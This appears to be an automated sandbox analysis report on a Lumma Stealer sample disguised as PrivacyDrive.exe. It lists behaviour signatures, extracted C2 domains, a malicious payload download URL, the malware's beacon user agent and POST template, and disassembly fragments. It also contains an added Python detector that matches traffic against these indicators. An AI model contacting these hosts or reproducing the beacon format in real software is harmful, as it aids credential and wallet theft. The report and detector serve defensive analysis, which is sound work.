Windows Analysis Report

Overview

General Information

Analysis ID: 1519581

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
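The following Python is an added example, not part of this sandbox report or of the sandbox's own tooling. It turns the indicators the report recovers in the AV Detection section (the Malware Configuration Extractor line with the nine C2 domains and the build id yJEcaG--rui1222, and the string-decryptor output TeslaBrowser/5.5 and lid=%s&j=%s&ver=4.0) into a small matcher that scans parsed HTTP requests for LummaC beacons. The request dictionaries and the three sample requests are constructed for the example; the assumption that the build id is what the malware puts in the lid field is the author's reading of the two decrypted strings, not something the report states.

```python
"""Match parsed HTTP requests against the LummaC indicators in this report.

Added example: the IOC values are copied from the report's configuration
extractor and string decryptor output; the request shape, the sample traffic
and the matching logic are constructed for illustration.
"""
import json
import re
from urllib.parse import parse_qs

# Configuration line exactly as the report's Malware Configuration Extractor prints it.
CONFIG_LINE = (
    'LummaC {"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", '
    '"defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", '
    '"surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", '
    '"racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}'
)

# Strings the report's string decryptor recovered from the PrivacyDrive.exe process.
C2_USER_AGENT = "TeslaBrowser/5.5"
# lid=%s&j=%s&ver=4.0 is the decrypted POST body template; the example assumes
# (not stated by the report) that lid carries the build id.
BEACON_BODY_RE = re.compile(r"^lid=[^&]+&j=[^&]*&ver=4\.0$")


def parse_config(line: str) -> dict:
    """Split the 'Family {json}' extractor line into family, C2 set and build id."""
    family, _, blob = line.partition(" ")
    cfg = json.loads(blob)
    return {"family": family, "c2": set(cfg["C2 url"]), "build_id": cfg["Build id"]}


def classify_request(req: dict, cfg: dict) -> list[str]:
    """Return the reasons one request looks like LummaC C2 traffic (empty = clean).

    req is an assumed dict with host, method, path, user_agent and body keys,
    the shape you would get after parsing a proxy or Zeek http.log export.
    """
    reasons = []
    host = req.get("host", "").lower().split(":")[0]
    if host in cfg["c2"]:
        reasons.append(f"host {host} is in the extracted C2 list")
    if req.get("user_agent") == C2_USER_AGENT:
        reasons.append("user agent is the hard-coded TeslaBrowser/5.5")
    body = req.get("body", "")
    if req.get("method") == "POST" and BEACON_BODY_RE.match(body):
        reasons.append("body matches the lid=&j=&ver=4.0 beacon template")
        lid = parse_qs(body).get("lid", [""])[0]
        if lid == cfg["build_id"]:
            reasons.append(f"lid equals the extracted build id {lid}")
    return reasons


def scan(requests: list[dict], cfg: dict) -> list[tuple[int, list[str]]]:
    """Run classify_request over a batch; return (index, reasons) for hits only."""
    hits = []
    for i, req in enumerate(requests):
        reasons = classify_request(req, cfg)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample traffic: a benign GET, a beacon to a listed C2 carrying the
# build id, and a POST with the right body shape but an unknown host and agent.
SAMPLE_REQUESTS = [
    {"host": "www.example.com", "method": "GET", "path": "/",
     "user_agent": "Mozilla/5.0", "body": ""},
    {"host": "racedsuitreow.shop", "method": "POST", "path": "/api",
     "user_agent": "TeslaBrowser/5.5", "body": "lid=yJEcaG--rui1222&j=&ver=4.0"},
    {"host": "cdn.example.net", "method": "POST", "path": "/api",
     "user_agent": "Mozilla/5.0", "body": "lid=abc&j=xyz&ver=4.0"},
]

if __name__ == "__main__":
    config = parse_config(CONFIG_LINE)
    for idx, why in scan(SAMPLE_REQUESTS, config):
        print(f"request {idx}: " + "; ".join(why))
```

The user-agent and body checks only work where the request is visible in clear, i.e. from endpoint telemetry or a TLS-intercepting proxy; the report shows the C2 sessions as TLS 1.2 to 185.255.122.133 and 172.67.206.221, so on raw network captures only the domain list (via DNS or SNI) and those two addresses are usable, and the body-shape match on its own, as the third sample request shows, is a weak signal that needs the host or agent to corroborate it.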

AV Detection

Source: https://racedsuitreow.shop/P Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/ Avira URL Cloud: Label: malware
Source: covvercilverow.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiJV& Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiU.h Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop Avira URL Cloud: Label: malware
Source: deallyharvenw.shop Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zipK Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zip Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiV Avira URL Cloud: Label: malware
Source: priooozekw.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/ Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/)e3 Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/a Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apisP Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/3 Avira URL Cloud: Label: malware
Source: surroundeocw.shop Avira URL Cloud: Label: malware
Source: racedsuitreow.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop:443/api Avira URL Cloud: Label: malware
Source: candleduseiwo.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apie Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il2.txt Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zipe Avira URL Cloud: Label: malware
Source: PrivacyDrive.exe.764.8.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: covvercilverow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: surroundeocw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: abortinoiwiam.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: pumpkinkwquo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: priooozekw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: deallyharvenw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: defenddsouneuw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: racedsuitreow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: candleduseiwo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp String decryptor: yJEcaG--rui1222
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0052D130 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_0052D130
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00477BE0 FindFirstFileW, 4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00495D80 FindFirstFileW,FindClose, 4_2_00495D80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_00F96013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_00F9600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 4_2_00F911B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 4_2_00FAD0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 4_2_00FA2132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 4_2_00FAD134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h 4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FCC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 4_2_00FBC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 4_2_00FC5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 4_2_00FC63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_00F9539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 4_2_00FA8312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 4_2_00F974E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 4_2_00F8F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, 0000000Bh 4_2_00FB54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebp, word ptr [edi] 4_2_00FC0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 4_2_00FA2403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+00000744h] 4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 4_2_00FA25AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 4_2_00FA8582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FAF577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 4_2_00F9F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 4_2_00F866B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FAA692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 4_2_00FCB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 4_2_00F87712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 4_2_00F958A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 4_2_00F9F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 4_2_00F9C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 4_2_00F92911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 4_2_00F97AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 4_2_00F97BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 4_2_00FCBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 4_2_00F88B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 4_2_00FC0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_00FB4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 4_2_00FC2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 4_2_00F94DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 4_2_00FB1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 4_2_00FA9DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 4_2_00FA5D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 4_2_00FCBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 4_2_00FC0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_00FB3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 4_2_00FCBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 4_2_00FAFEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_00FB4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FC4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_00FB4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_00FB0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_00FCBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_00FB3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_00FB3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 4_2_051AF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 4_2_051EA1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_051D2531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_051D24B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_051EA5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_051D3419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 4_2_051CF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_051D342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 4_2_051E3420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 4_2_051D24D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 4_2_051EA4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 4_2_051CE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 4_2_051DF4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 4_2_051CB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 4_2_051C0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 4_2_051CB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_051B4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_051B460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 4_2_051E1100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 4_2_051D314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 4_2_051A7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 4_2_051DF160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 4_2_051B61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 4_2_051B60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 4_2_051EA360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 4_2_051C4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 4_2_051D03B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 4_2_051C83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 4_2_051B33DB
